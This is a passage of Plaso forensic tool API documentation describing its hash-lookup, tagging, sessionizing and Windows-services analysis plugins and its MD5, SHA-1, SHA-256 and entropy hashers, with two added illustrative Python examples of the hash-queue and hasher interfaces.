number of seconds the analyzer will sleep for after analyzing a batch of hashes.
Type int
abstract Analyze(hashes)
Analyzes a list of hashes.
Parameters hashes (list[str]) – list of hashes to look up.
Returns list of results of analyzing the hashes.
Return type list[HashAnalysis]
EMPTY_QUEUE_WAIT_TIME = 4
SUPPORTED_HASHES = []
SetLookupHash(lookup_hash)
Sets the hash to query.
Parameters lookup_hash (str) – name of the hash attribute to look up.
Raises ValueError – if the lookup hash is not supported.
SignalAbort()
Instructs this analyzer to stop running.
run()
The method called by the threading library to start the thread.
class plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin(analyzer_class)
Bases: plaso.analysis.interface.AnalysisPlugin
An interface for plugins that tag events based on the source file hash.
An implementation of this class should be paired with an implementation of the HashAnalyzer interface.
hash_analysis_queue
queue that contains the results of analysis of file hashes.
Type queue.Queue
hash_queue
queue that contains file hashes.
Type queue.Queue
CompileReport(mediator)
Compiles an analysis report.
Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
Returns report.
Return type AnalysisReport
DATA_TYPES = []
DEFAULT_QUEUE_TIMEOUT = 4
EstimateTimeRemaining()
Estimates how long until all hashes have been analyzed.
Returns estimated number of seconds until all hashes have been analyzed.
Return type int
ExamineEvent(mediator, event, event_data, event_data_stream)
Evaluates whether an event contains the right data for a hash lookup.
Parameters
• mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
abstract GenerateLabels(hash_information)
Generates a list of strings to tag events with.
Parameters hash_information (object) – object that mediates the result of the analysis of a hash, as returned by the Analyze() method of the analyzer class associated with this plugin.
Returns list of labels to apply to events.
Return type list[str]
SECONDS_BETWEEN_STATUS_LOG_MESSAGES = 30
SetLookupHash(lookup_hash)
Sets the hash to query.
Parameters lookup_hash (str) – name of the hash attribute to look up.
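The queue contract documented above (hashes in on hash_queue, HashAnalysis objects out on hash_analysis_queue, batches of hashes_per_batch, SetLookupHash() rejecting unsupported hashes, SignalAbort() stopping the thread) as an added, runnable illustration; this is not Plaso's own code. KnownHashSetAnalyzer is an offline stand-in for the nsrlsvr lookup that answers from a constructed local set, and TagEvents, DATA_TYPES and the sample event data records are assumptions made here.

```python
import queue
import threading
import time

class HashAnalysis(object):
  """Analysis information about a hash: subject_hash and hash_information."""

  def __init__(self, subject_hash, hash_information):
    self.subject_hash = subject_hash
    self.hash_information = hash_information

class HashAnalyzer(threading.Thread):
  """Analyzer thread: takes up to hashes_per_batch hashes off hash_queue per
  round and puts one HashAnalysis per hash onto hash_analysis_queue."""
  EMPTY_QUEUE_WAIT_TIME = 0.05  # shortened from the documented 4 seconds
  SUPPORTED_HASHES = []

  def __init__(self, hash_queue, hash_analysis_queue, hashes_per_batch=1,
               lookup_hash='sha256', wait_after_analysis=0):
    super(HashAnalyzer, self).__init__()
    self.daemon = True
    self._abort = False
    self._hash_queue = hash_queue
    self._hash_analysis_queue = hash_analysis_queue
    self.analyses_performed = 0
    self.hashes_per_batch = hashes_per_batch
    self.lookup_hash = lookup_hash
    self.wait_after_analysis = wait_after_analysis

  def Analyze(self, hashes):
    raise NotImplementedError()

  def SetLookupHash(self, lookup_hash):
    # Rejects hash names the concrete analyzer cannot look up.
    if lookup_hash not in self.SUPPORTED_HASHES:
      raise ValueError('Unsupported lookup hash: {0:s}'.format(lookup_hash))
    self.lookup_hash = lookup_hash

  def SignalAbort(self):
    self._abort = True

  def run(self):
    while not self._abort:
      hashes = []
      while len(hashes) < self.hashes_per_batch:
        try:
          hashes.append(self._hash_queue.get_nowait())
        except queue.Empty:
          break
      if not hashes:
        time.sleep(self.EMPTY_QUEUE_WAIT_TIME)
        continue
      for analysis in self.Analyze(hashes):
        self._hash_analysis_queue.put(analysis)
      self.analyses_performed += 1
      time.sleep(self.wait_after_analysis)

class KnownHashSetAnalyzer(HashAnalyzer):
  """Offline stand-in for the nsrlsvr lookup: membership in a local set."""
  SUPPORTED_HASHES = ['md5', 'sha1']
  # Constructed reference set; its only entry is the MD5 of an empty file.
  KNOWN_HASHES = frozenset(['d41d8cd98f00b204e9800998ecf8427e'])

  def Analyze(self, hashes):
    # hash_information is a bool, as documented for NsrlsvrAnalysisPlugin.
    return [HashAnalysis(h, h.lower() in self.KNOWN_HASHES) for h in hashes]

DATA_TYPES = ['fs:stat', 'fs:stat:ntfs']

def GenerateLabels(hash_information):
  """Labels for events whose file hash was, or was not, in the set."""
  return ['nsrl_present'] if hash_information else ['nsrl_not_present']

def TagEvents(event_data_list, hashes_per_batch=2):
  """Plugin side: queues the lookup hash of each eligible event data record,
  collects the analyzer's answers and returns {hash: labels}."""
  hash_queue = queue.Queue()
  hash_analysis_queue = queue.Queue()
  analyzer = KnownHashSetAnalyzer(
      hash_queue, hash_analysis_queue, hashes_per_batch=hashes_per_batch)
  analyzer.SetLookupHash('md5')
  queued = 0
  for event_data in event_data_list:
    # Only the plugin's DATA_TYPES carrying the lookup hash attribute qualify.
    if event_data.get('data_type') not in DATA_TYPES:
      continue
    digest = event_data.get('{0:s}_hash'.format(analyzer.lookup_hash))
    if digest:
      hash_queue.put(digest)
      queued += 1
  analyzer.start()
  labels = {}
  for _ in range(queued):
    analysis = hash_analysis_queue.get(timeout=5)
    labels[analysis.subject_hash] = GenerateLabels(analysis.hash_information)
  analyzer.SignalAbort()
  analyzer.join()
  return labels
```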
plaso.analysis.interface module
This file contains the interface for analysis plugins.
class plaso.analysis.interface.AnalysisPlugin
Bases: object
Class that defines the analysis plugin interface.
abstract CompileReport(mediator)
Compiles a report of the analysis.
After the plugin has received every copy of an event to analyze this function will be called so that the report can be assembled.
Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
Returns report.
Return type AnalysisReport
ENABLE_IN_EXTRACTION = False
abstract ExamineEvent(mediator, event, event_data, event_data_stream)
Analyzes an event.
Parameters
• mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
• event (EventObject) – event.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
NAME = 'analysis_plugin'
URLS = []
property plugin_name
name of the plugin.
Type str
plaso.analysis.logger module
The analysis sub module logger.
plaso.analysis.manager module
This file contains the analysis plugin manager class.
class plaso.analysis.manager.AnalysisPluginManager
Bases: object
Analysis plugin manager.
classmethod DeregisterPlugin(plugin_class)
Deregisters an analysis plugin class.
The analysis plugin classes are identified by their lower case name.
Parameters plugin_class (type) – class of the analysis plugin.
Raises KeyError – if an analysis plugin class is not set for the corresponding name.
classmethod GetAllPluginInformation(show_all=True)
Retrieves a list of the registered analysis plugins.
Parameters show_all (Optional[bool]) – True if all analysis plugin names should be listed.
Returns the name, docstring and type string of each analysis plugin in alphabetical order.
Return type list[tuple[str, str, str]]
classmethod GetPluginNames()
Retrieves the analysis plugin names.
Returns analysis plugin names.
Return type list[str]
classmethod GetPluginObjects(plugin_names)
Retrieves the plugin objects.
Parameters plugin_names (list[str]) – names of plugins that should be retrieved.
Returns analysis plugins per name.
Return type dict[str, AnalysisPlugin]
classmethod GetPlugins()
Retrieves the registered analysis plugin classes.
Yields tuple – containing:
str: name of the plugin
type: plugin class
classmethod RegisterPlugin(plugin_class)
Registers an analysis plugin class.
The analysis plugin classes are identified based on their lower case name.
Parameters plugin_class (type) – class of the analysis plugin.
Raises KeyError – if an analysis plugin class is already set for the corresponding name.
classmethod RegisterPlugins(plugin_classes)
Registers analysis plugin classes.
The analysis plugin classes are identified based on their lower case name.
Parameters plugin_classes (list[type]) – classes of the analysis plugins.
Raises KeyError – if an analysis plugin class is already set for the corresponding name.
plaso.analysis.mediator module
The analysis plugin mediator object.
class plaso.analysis.mediator.AnalysisMediator(storage_writer, knowledge_base, data_location=None)
Bases: object
Analysis plugin mediator.
last_activity_timestamp
timestamp received that indicates the last time activity was observed. The last activity timestamp is updated when the mediator produces an attribute container, such as an event tag. This timestamp is used by the multi processing worker process to indicate the last time the worker was known to be active. This information is then used by the foreman to detect workers that are not responding (stalled).
Type int
number_of_produced_analysis_reports
number of produced analysis reports.
Type int
number_of_produced_event_tags
number of produced event tags.
Type int
GetDisplayNameForPathSpec(path_spec)
Retrieves the display name for a path specification.
Parameters path_spec (dfvfs.PathSpec) – path specification.
Returns human readable version of the path specification.
Return type str
GetUsernameForPath(path)
Retrieves a username for a specific path.
This determines whether a specific path is within a user's directory and, if so, returns the username of that user.
Parameters path (str) – path.
Returns username or None if the path does not appear to be within a user's directory.
Return type str
ProduceAnalysisReport(plugin)
Produces an analysis report.
Parameters plugin (AnalysisPlugin) – plugin.
ProduceEventTag(event_tag)
Produces an event tag.
Parameters event_tag (EventTag) – event tag.
SignalAbort()
Signals the analysis plugins to abort.
property abort
True if the analysis should be aborted.
Type bool
property data_location
path to the data files.
Type str
property operating_system
operating system or None if not set.
Type str
plaso.analysis.nsrlsvr module
Analysis plugin to look up files in nsrlsvr and tag events.
class plaso.analysis.nsrlsvr.NsrlsvrAnalysisPlugin
Bases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin
Analysis plugin for looking up hashes in nsrlsvr.
DATA_TYPES = ['fs:stat', 'fs:stat:ntfs']
GenerateLabels(hash_information)
Generates a list of strings that will be used in the event tag.
Parameters hash_information (bool) – whether the analyzer received a response from nsrlsvr indicating that the hash was present in its loaded NSRL set.
Returns strings describing the results from nsrlsvr.
Return type list[str]
NAME = 'nsrlsvr'
SetHost(host)
Sets the address or hostname of the server running nsrlsvr.
Parameters host (str) – IP address or hostname to query.
SetLabel(label)
Sets the tagging label.
Parameters label (str) – label to apply to events extracted from files that are present in nsrlsvr.
SetPort(port)
Sets the port where nsrlsvr is listening.
Parameters port (int) – port to query.
TestConnection()
Tests the connection to nsrlsvr.
Returns True if nsrlsvr instance is reachable.
Return type bool
URLS = ['https://rjhansen.github.io/nsrlsvr/']
class plaso.analysis.nsrlsvr.NsrlsvrAnalyzer(hash_queue, hash_analysis_queue, **kwargs)
Bases: plaso.analysis.hash_tagging.HashAnalyzer
Analyzes file hashes by consulting an nsrlsvr instance.
analyses_performed
number of analysis batches completed by this analyzer.
Type int
hashes_per_batch
maximum number of hashes to analyze at once.
Type int
seconds_spent_analyzing
number of seconds this analyzer has spent performing analysis (as opposed to waiting on queues, etc.).
Type int
wait_after_analysis
number of seconds the analyzer will sleep for after analyzing a batch of hashes.
Type int
Analyze(hashes)
Looks up hashes in nsrlsvr.
Parameters hashes (list[str]) – hash values to look up.
Returns analysis results, or an empty list on error.
Return type list[HashAnalysis]
SUPPORTED_HASHES = ['md5', 'sha1']
SetHost(host)
Sets the address or hostname of the server running nsrlsvr.
Parameters host (str) – IP address or hostname to query.
SetPort(port)
Sets the port where nsrlsvr is listening.
Parameters port (int) – port to query.
TestConnection()
Tests the connection to nsrlsvr.
Checks if a connection can be set up and queries the server for the MD5 of an empty file and expects a response. The value of the response is not checked.
Returns True if nsrlsvr instance is reachable.
Return type bool
plaso.analysis.sessionize module
A plugin to tag events according to rules in a tag file.
class plaso.analysis.sessionize.SessionizeAnalysisPlugin
Bases: plaso.analysis.interface.AnalysisPlugin
Analysis plugin that labels events by session.
CompileReport(mediator)
Compiles an analysis report.
Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
Returns analysis report.
Return type AnalysisReport
ENABLE_IN_EXTRACTION = False
ExamineEvent(mediator, event, event_data, event_data_stream)
Analyzes an EventObject and tags it as part of a session.
Parameters
• mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
• event (EventObject) – event to examine.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
NAME = 'sessionize'
SetMaximumPause(maximum_pause_minutes)
Sets the maximum pause interval between events to consider a session.
Parameters maximum_pause_minutes (int) – maximum gap between events that are part of the same session, in minutes.
plaso.analysis.tagging module
A plugin to tag events according to rules in a tagging file.
class plaso.analysis.tagging.TaggingAnalysisPlugin
Bases: plaso.analysis.interface.AnalysisPlugin
Analysis plugin that tags events according to rules in a tagging file.
CompileReport(mediator)
Compiles an analysis report.
Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
Returns analysis report.
Return type AnalysisReport
ENABLE_IN_EXTRACTION = True
ExamineEvent(mediator, event, event_data, event_data_stream)
Analyzes an EventObject and tags it according to rules in the tag file.
Parameters
• mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
• event (EventObject) – event to examine.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
NAME = 'tagging'
SetAndLoadTagFile(tagging_file_path)
Sets the tag file to be used by the plugin.
Parameters tagging_file_path (str) – path of the tagging file.
plaso.analysis.unique_domains_visited module
A plugin to generate a list of domains visited.
class plaso.analysis.unique_domains_visited.UniqueDomainsVisitedPlugin
Bases: plaso.analysis.interface.AnalysisPlugin
A plugin to generate a list of all domains visited.
This plugin will extract domains from browser history events extracted by Plaso. The list produced can be used to quickly determine if there has been a visit to a site of interest, for example, a known phishing site.
CompileReport(mediator)
Compiles an analysis report.
Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
Returns the analysis report.
Return type AnalysisReport
ENABLE_IN_EXTRACTION = True
ExamineEvent(mediator, event, event_data, event_data_stream)
Analyzes an event and extracts domains from it.
We only evaluate straightforward web history events, not visits which can be inferred by TypedURLs, cookies or other means.
Parameters
• mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
• event (EventObject) – event to examine.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
NAME = 'unique_domains_visited'
plaso.analysis.viper module
Analysis plugin to look up files in Viper and tag events.
class plaso.analysis.viper.ViperAnalysisPlugin
Bases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin
An analysis plugin for looking up SHA256 hashes in Viper.
DATA_TYPES = ['pe:compilation:compilation_time']
GenerateLabels(hash_information)
Generates a list of strings that will be used in the event tag.
Parameters hash_information (dict[str, object]) – JSON decoded contents of the result of a Viper lookup, as produced by the ViperAnalyzer.
Returns list of labels to apply to events.
Return type list[str]
NAME = 'viper'
SetHost(host)
Sets the address or hostname of the server running Viper.
Parameters host (str) – IP address or hostname to query.
SetPort(port)
Sets the port where the Viper server is listening.
Parameters port (int) – port to query.
SetProtocol(protocol)
Sets the protocol that will be used to query Viper.
Parameters protocol (str) – protocol to use to query Viper. Either 'http' or 'https'.
Raises ValueError – if an invalid protocol is selected.
TestConnection()
Tests the connection to the Viper server.
Returns True if the Viper server instance is reachable.
Return type bool
URLS = ['https://viper.li']
class plaso.analysis.viper.ViperAnalyzer(hash_queue, hash_analysis_queue, **kwargs)
Bases: plaso.analysis.hash_tagging.HTTPHashAnalyzer
Class that analyzes file hashes by consulting Viper.
REST API reference: https://viper-framework.readthedocs.io/en/latest/usage/web.html#api
Analyze(hashes)
Looks up hashes in Viper using the Viper HTTP API.
Parameters hashes (list[str]) – hashes to look up.
Returns hash analysis.
Return type list[HashAnalysis]
Raises RuntimeError – if no host has been set for Viper.
SUPPORTED_HASHES = ['md5', 'sha256']
SUPPORTED_PROTOCOLS = ['http', 'https']
SetHost(host)
Sets the address or hostname of the server running Viper.
Parameters host (str) – IP address or hostname to query.
SetPort(port)
Sets the port where the Viper server is listening.
Parameters port (int) – port to query.
SetProtocol(protocol)
Sets the protocol that will be used to query Viper.
Parameters protocol (str) – protocol to use to query Viper. Either 'http' or 'https'.
Raises ValueError – if the protocol is not supported.
TestConnection()
Tests the connection to the Viper server.
Returns True if the Viper server instance is reachable.
Return type bool
plaso.analysis.virustotal module
Analysis plugin to look up files in VirusTotal and tag events.
class plaso.analysis.virustotal.VirusTotalAnalysisPlugin
Bases: plaso.analysis.hash_tagging.HashTaggingAnalysisPlugin
An analysis plugin for looking up hashes in VirusTotal.
DATA_TYPES = ['pe:compilation:compilation_time']
EnableFreeAPIKeyRateLimit()
Configures rate limiting for queries to VirusTotal.
The default rate limit for free VirusTotal API keys is 4 requests per minute.
GenerateLabels(hash_information)
Generates a list of strings that will be used in the event tag.
Parameters hash_information (dict[str, object]) – the JSON decoded contents of the result of a VirusTotal lookup, as produced by the VirusTotalAnalyzer.
Returns strings describing the results from VirusTotal.
Return type list[str]
NAME = 'virustotal'
SetAPIKey(api_key)
Sets the VirusTotal API key to use in queries.
Parameters api_key (str) – VirusTotal API key.
TestConnection()
Tests the connection to VirusTotal.
Returns True if VirusTotal is reachable.
Return type bool
URLS = ['https://virustotal.com']
class plaso.analysis.virustotal.VirusTotalAnalyzer(hash_queue, hash_analysis_queue, **kwargs)
Bases: plaso.analysis.hash_tagging.HTTPHashAnalyzer
Class that analyzes file hashes by consulting VirusTotal.
Analyze(hashes)
Looks up hashes in VirusTotal using the VirusTotal HTTP API.
The API is documented here: https://developers.virustotal.com/reference
Parameters hashes (list[str]) – hashes to look up.
Returns analysis results.
Return type list[HashAnalysis]
Raises RuntimeError – if the VirusTotal API key has not been set.
SUPPORTED_HASHES = ['md5', 'sha1', 'sha256']
SetAPIKey(api_key)
Sets the VirusTotal API key to use in queries.
Parameters api_key (str) – VirusTotal API key.
TestConnection()
Tests the connection to VirusTotal.
Returns True if VirusTotal is reachable.
Return type bool
plaso.analysis.windows_services module
A plugin to enable quick triage of Windows Services.
class plaso.analysis.windows_services.WindowsServiceCollection
Bases: object
Class to hold and de-duplicate Windows Services.
AddService(new_service)
Adds a new service to the list of ones we know about.
Parameters new_service (WindowsService) – the service to add.
property services
services in this collection.
Type list[WindowsService]
class plaso.analysis.windows_services.WindowsServicesAnalysisPlugin
Bases: plaso.analysis.interface.AnalysisPlugin
Provides a single list of Windows services found in the Registry.
CompileReport(mediator)
Compiles an analysis report.
Parameters mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
Returns report.
Return type AnalysisReport
ENABLE_IN_EXTRACTION = True
ExamineEvent(mediator, event, event_data, event_data_stream)
Analyzes an event and creates Windows Services as required.
At present, this method only handles events extracted from the Registry.
Parameters
• mediator (AnalysisMediator) – mediates interactions between analysis plugins and other components, such as storage and dfvfs.
• event (EventObject) – event to examine.
• event_data (EventData) – event data.
• event_data_stream (EventDataStream) – event data stream.
NAME = 'windows_services'
SetOutputFormat(output_format)
Sets the output format of the generated report.
Parameters output_format (str) – format the plugin should use to produce its output.
Module contents
This file imports Python modules that register analysis plugins.
5.1.2 plaso.analyzers package
Subpackages
plaso.analyzers.hashers package
Submodules
plaso.analyzers.hashers.entropy module
The entropy calculation implementation.
class plaso.analyzers.hashers.entropy.EntropyHasher
Bases: plaso.analyzers.hashers.interface.BaseHasher
Calculates the byte entropy of input files.
ATTRIBUTE_NAME = 'file_entropy'
DESCRIPTION = 'Calculates the byte entropy of input data.'
GetStringDigest()
Calculates the byte entropy value.
Byte entropy is a value between 0.0 and 8.0, and is returned as a string to match the Plaso analyzer and storage APIs.
Returns byte entropy formatted as a floating point number with 6 decimal places calculated over the data blocks passed to Update().
Return type str
NAME = 'entropy'
Update(data)
Updates the state of the entropy calculator with a new block of data.
Repeated calls to update are equivalent to one single call with the concatenation of the arguments.
Parameters data (bytes) – block of data with which to update the context of the entropy calculator.
plaso.analyzers.hashers.interface module
The hasher interface.
class plaso.analyzers.hashers.interface.BaseHasher
Bases: object
Base class for objects that calculate hashes.
ATTRIBUTE_NAME = 'hash'
DESCRIPTION = 'Calculates a digest hash over input data.'
abstract GetStringDigest()
Retrieves the digest of the hash function expressed as a Unicode string.
Returns string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters.
Return type str
NAME = 'base_hasher'
abstract Update(data)
Updates the current state of the hasher with a new block of data.
Repeated calls to update are equivalent to one single call with the concatenation of the arguments.
Parameters data (bytes) – data with which to update the context of the hasher.
plaso.analyzers.hashers.manager module
This file contains a class for managing digest hashers for Plaso.
class plaso.analyzers.hashers.manager.HashersManager
Bases: object
Class that implements the hashers manager.
classmethod DeregisterHasher(hasher_class)
Deregisters a hasher class.
The hasher classes are identified based on their lower case name.
Parameters hasher_class (type) – class object of the hasher.
Raises KeyError – if hasher class is not set for the corresponding name.
classmethod GetHasher(hasher_name)
Retrieves an instance of a specific hasher.
Parameters hasher_name (str) – the name of the hasher to retrieve.
Returns hasher.
Return type BaseHasher
Raises KeyError – if hasher class is not set for the corresponding name.
classmethod GetHasherClasses(hasher_names=None)
Retrieves the registered hashers.
Parameters hasher_names (list[str]) – names of the hashers to retrieve.
Yields tuple – containing:
str: hasher name
type: next hasher class
classmethod GetHasherNames()
Retrieves the names of all loaded hashers.
Returns hasher names.
Return type list[str]
classmethod GetHasherNamesFromString(hasher_names_string)
Retrieves a list of hasher names from a comma separated string.
Takes a string of comma separated hasher names and transforms it into a list of hasher names.
Parameters hasher_names_string (str) – comma separated names of hashers to enable, the string 'all' to enable all hashers or 'none' to disable all hashers.
Returns names of valid hashers from the string, or an empty list if no valid names are found.
Return type list[str]
classmethod GetHashers(hasher_names)
Retrieves instances for all the specified hashers.
Parameters hasher_names (list[str]) – names of the hashers to retrieve.
Returns hashers.
Return type list[BaseHasher]
classmethod GetHashersInformation()
Retrieves the hashers information.
Returns list of tuples containing:
str: hasher name
str: hasher description
Return type list[tuple]
classmethod RegisterHasher(hasher_class)
Registers a hasher class.
The hasher classes are identified based on their lower case name.
Parameters hasher_class (type) – class object of the hasher.
Raises KeyError – if hasher class is already set for the corresponding name.
plaso.analyzers.hashers.md5 module
The MD5 hasher implementation.
class plaso.analyzers.hashers.md5.MD5Hasher
Bases: plaso.analyzers.hashers.interface.BaseHasher
This class provides MD5 hashing functionality.
ATTRIBUTE_NAME = 'md5_hash'
DESCRIPTION = 'Calculates an MD5 digest hash over input data.'
GetStringDigest()
Returns the digest of the hash function expressed as a Unicode string.
Returns string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters.
Return type str
NAME = 'md5'
Update(data)
Updates the current state of the hasher with a new block of data.
Repeated calls to update are equivalent to one single call with the concatenation of the arguments.
Parameters data (bytes) – block of data with which to update the context of the hasher.
plaso.analyzers.hashers.sha1 module
The SHA-1 hasher implementation.
class plaso.analyzers.hashers.sha1.SHA1Hasher
Bases: plaso.analyzers.hashers.interface.BaseHasher
This class provides SHA-1 hashing functionality.
ATTRIBUTE_NAME = 'sha1_hash'
DESCRIPTION = 'Calculates a SHA-1 digest hash over input data.'
GetStringDigest()
Returns the digest of the hash function expressed as a Unicode string.
Returns string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters.
Return type str
NAME = 'sha1'
Update(data)
Updates the current state of the hasher with a new block of data.
Repeated calls to update are equivalent to one single call with the concatenation of the arguments.
Parameters data (bytes) – block of data with which to update the context of the hasher.
plaso.analyzers.hashers.sha256 module
The SHA-256 hasher implementation.
class plaso.analyzers.hashers.sha256.SHA256Hasher
Bases: plaso.analyzers.hashers.interface.BaseHasher
This class provides SHA-256 hashing functionality.
ATTRIBUTE_NAME = 'sha256_hash'
DESCRIPTION = 'Calculates a SHA-256 digest hash over input data.'
GetStringDigest()
Returns the digest of the hash function expressed as a Unicode string.
Returns string hash digest calculated over the data blocks passed to Update(). The string consists of printable Unicode characters.
Return type str
NAME = 'sha256'
Update(data)
Updates the current state of the hasher with a new block of data.
Repeated calls to update are equivalent to one single call with the concatenation of the arguments.
Parameters data (bytes) – block of data with which to update the context of the hasher.
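As an added example that is not Plaso's own implementation, the BaseHasher contract from the interface module (Update() fed block by block, GetStringDigest() returning a string), the entropy hasher's 0.0 to 8.0 value with 6 decimal places, the three digest hashers, and the lower-case-name registry plus 'all'/'none' handling of the HashersManager, in one runnable block; DigestHasher and HashData are helper names assumed here.

```python
import collections
import hashlib
import math

class BaseHasher(object):
  """Hasher interface; GetStringDigest() returns the digest as a string."""
  NAME = 'base_hasher'
  ATTRIBUTE_NAME = 'hash'

  def Update(self, data):
    # Repeated calls are equivalent to one call on the concatenated data.
    raise NotImplementedError()

  def GetStringDigest(self):
    raise NotImplementedError()

class DigestHasher(BaseHasher):
  """Shared hashlib-backed implementation for the MD5, SHA-1, SHA-256 hashers."""
  ALGORITHM = None

  def __init__(self):
    self._digest = hashlib.new(self.ALGORITHM)

  def Update(self, data):
    self._digest.update(data)

  def GetStringDigest(self):
    return self._digest.hexdigest()

class MD5Hasher(DigestHasher):
  NAME = ALGORITHM = 'md5'
  ATTRIBUTE_NAME = 'md5_hash'

class SHA1Hasher(DigestHasher):
  NAME = ALGORITHM = 'sha1'
  ATTRIBUTE_NAME = 'sha1_hash'

class SHA256Hasher(DigestHasher):
  NAME = ALGORITHM = 'sha256'
  ATTRIBUTE_NAME = 'sha256_hash'

class EntropyHasher(BaseHasher):
  """Calculates the Shannon byte entropy, between 0.0 and 8.0 bits per byte."""
  NAME = 'entropy'
  ATTRIBUTE_NAME = 'file_entropy'

  def __init__(self):
    self._byte_counts = collections.Counter()  # byte value -> occurrences
    self._size = 0

  def Update(self, data):
    self._byte_counts.update(data)  # iterating bytes yields ints 0..255
    self._size += len(data)

  def GetStringDigest(self):
    # Formatted with 6 decimal places to match the storage API. With no data
    # the Counter is empty, so the loop is skipped and the result is 0.0.
    entropy = 0.0
    for count in self._byte_counts.values():
      probability = count / self._size
      entropy -= probability * math.log2(probability)
    return '{0:.6f}'.format(entropy)

class HashersManager(object):
  """Registry of hasher classes keyed by their lower case NAME."""
  _hasher_classes = {}

  @classmethod
  def RegisterHasher(cls, hasher_class):
    name = hasher_class.NAME.lower()
    if name in cls._hasher_classes:
      raise KeyError('Hasher class already set for name: {0:s}.'.format(name))
    cls._hasher_classes[name] = hasher_class

  @classmethod
  def GetHasherNamesFromString(cls, hasher_names_string):
    # 'all' enables every hasher, 'none' disables all; unknown names are dropped.
    text = (hasher_names_string or '').strip().lower()
    if text == 'all':
      return sorted(cls._hasher_classes)
    if text == 'none':
      return []
    return [name for name in (part.strip() for part in text.split(','))
            if name in cls._hasher_classes]

  @classmethod
  def GetHashers(cls, hasher_names):
    return [cls._hasher_classes[name]() for name in hasher_names]

for _hasher_class in (EntropyHasher, MD5Hasher, SHA1Hasher, SHA256Hasher):
  HashersManager.RegisterHasher(_hasher_class)

def HashData(data, hasher_names_string='all', block_size=4096):
  """Streams data into the enabled hashers and returns {ATTRIBUTE_NAME: digest}."""
  hashers = HashersManager.GetHashers(
      HashersManager.GetHasherNamesFromString(hasher_names_string))
  for offset in range(0, len(data), block_size):
    for hasher in hashers:
      hasher.Update(data[offset:offset + block_size])
  return {hasher.ATTRIBUTE_NAME: hasher.GetStringDigest() for hasher in hashers}
```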
Module contents
This file imports Python modules that register hashers.
Submodules
plaso.analyzers.hashing_analyzer module
The hashing analyzer implementation.
class plaso.analyzers.hashing_analyzer.HashingAnalyzer
Bases: plaso.analyzers.interface.BaseAnalyzer
This class contains code for calculating file hashes of input files.
In Plaso, hashers are classes that map arbitrarily sized file content to a fixed size value. See: https://en.wikipedia.org/wiki/Hash_function
Analyze(data)
Updates the internal state of the analyzer, processing a block of data.
Repeated calls are equivalent to a single call with the concatenation of all the arguments.
Parameters data (bytes) – block of data from the data stream.
DESCRIPTION = 'Calculates hashes of file content.'
GetResults()
Retrieves the hashing results.
Returns results.
Return type list[AnalyzerResult]
INCREMENTAL_ANALYZER = True
NAME = 'hashing'
PROCESSING_STATUS_HINT = 'hashing'
Reset()
Resets the internal state of the analyzer.
SetHasherNames(hasher_names_string)
Sets the hashers that should be enabled.
Parameters hasher_names_string (str) – comma separated names of hashers to enable.
plaso.analyzers.interface module
Definitions to provide a whole-file processing framework.
class plaso.analyzers.interface.BaseAnalyzer
Bases: object
Class that provides the interface for whole-file analysis.
abstract Analyze(data)
Analyzes a block of data, updating the state of the analyzer.
Parameters data (bytes) – block of data to process.
DESCRIPTION = ''
abstract GetResults()
Retrieves the results of the analysis.
Returns results.
Return type list[AnalyzerResult]
INCREMENTAL_ANALYZER = False
NAME = 'base_analyzer'
PROCESSING_STATUS_HINT = 'analyzing'
abstract Reset()
Resets the internal state of the analyzer.
SIZE_LIMIT = 33554432
plaso.analyzers.logger module
The analyzers sub module logger.
plaso.analyzers.manager module
This file contains a class for managing digest analyzers for Plaso.
class plaso.analyzers.manager.AnalyzersManager
Bases: object
Class that implements the analyzers manager.
classmethod DeregisterAnalyzer(analyzer_class)
Deregisters an analyzer class.
The analyzer classes are identified based on their lower case name.
Parameters analyzer_class (type) – class object of the analyzer.
Raises KeyError – if analyzer class is not set for the corresponding name.
classmethod GetAnalyzerInstance(analyzer_name)
Retrieves an instance of a specific analyzer.
Parameters analyzer_name (str) – name of the analyzer to retrieve.
Returns analyzer instance.
Return type BaseAnalyzer
Raises KeyError – if analyzer class is not set for the corresponding name.
classmethod GetAnalyzerInstances(analyzer_names)
Retrieves instances for all the specified analyzers.
Parameters analyzer_names (list[str]) – names of the analyzers to retrieve.
Returns analyzer instances.
Return type list[BaseAnalyzer]
classmethod GetAnalyzerNames()
Retrieves the names of all loaded analyzers.
Returns names of the analyzers.
Return type list[str]
classmethod GetAnalyzers()
Retrieves the registered analyzers.
Yields tuple containing:
str: the uniquely identifying name of the analyzer.
type: the analyzer class.
classmethod GetAnalyzersInformation()
Retrieves the analyzers information.
Returns list of tuples containing:
str: analyzer name.
str: analyzer description.
Return type list[tuple]
classmethod RegisterAnalyzer(analyzer_class)
Registers an analyzer class.
The analyzer classes are identified by their lower case name.
Parameters analyzer_class (type) – the analyzer class to register.
Raises KeyError – if analyzer class is already set for the corresponding name.
plaso.analyzers.yara_analyzer module
Analyzer that matches Yara rules.
class plaso.analyzers.yara_analyzer.YaraAnalyzer
Bases: plaso.analyzers.interface.BaseAnalyzer
Analyzer that matches Yara rules.
Analyze(data)
